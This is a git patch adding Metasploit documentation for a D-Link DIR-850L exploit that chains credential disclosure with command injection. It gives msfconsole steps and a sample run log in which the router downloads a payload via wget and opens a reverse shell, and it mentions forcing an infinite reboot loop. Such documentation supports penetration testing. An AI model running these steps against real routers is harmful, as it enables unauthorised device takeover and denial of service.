From caad1bbf271f27cbd22334bb2cc5e1288bc4d6a0 Mon Sep 17 00:00:00 2001
From: Austin <30811388+realoriginal@users.noreply.github.com>
Date: Thu, 2 Nov 2017 15:54:45 -0400
Subject: [PATCH] Create dlink_dir850l_unauth_exec.md

---
 .../linux/http/dlink_dir850l_unauth_exec.md   | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md

diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md
new file mode 100644
index 0000000000..dc8863c9d1
--- /dev/null
+++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md
@@ -0,0 +1,40 @@
+The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection
+vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07
+are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop.
+
+## Vulnerable Application
+
+
+  1. Start msfconsole
+  2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb`
+  3. Do : `set RHOST [RouterIP]`
+  4. Do : `set PAYLOAD linux/mipsle/shell/reverse_tcp`
+  5. Do : `run`
+  6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session
+
+
+## Example
+
+```
+msf > use exploit/linux/http/dlink_850l_unauth_exec
+msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
+RHOST => 192.168.0.14
+msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
+RPORT => 80
+msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
+LHOST => ens3
+msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
+LPORT => 1351
+msf exploit(dlink_850l_unauthenticated_exec) > run
+
+[*] Started reverse TCP handler on 192.168.0.11:1351
+[*] 192.168.0.14:80 - Initiating exploitation...
+[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl
+[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl
+[*] 192.168.0.14:80 - Retrieving uid and auth challenge...
+[*] Command Stager progress - 100.00% done (101/101 bytes)
+[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl
+[*] Sending payload to 192.168.0.14 (Wget)
+[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400
+[*] Server stopped.
+```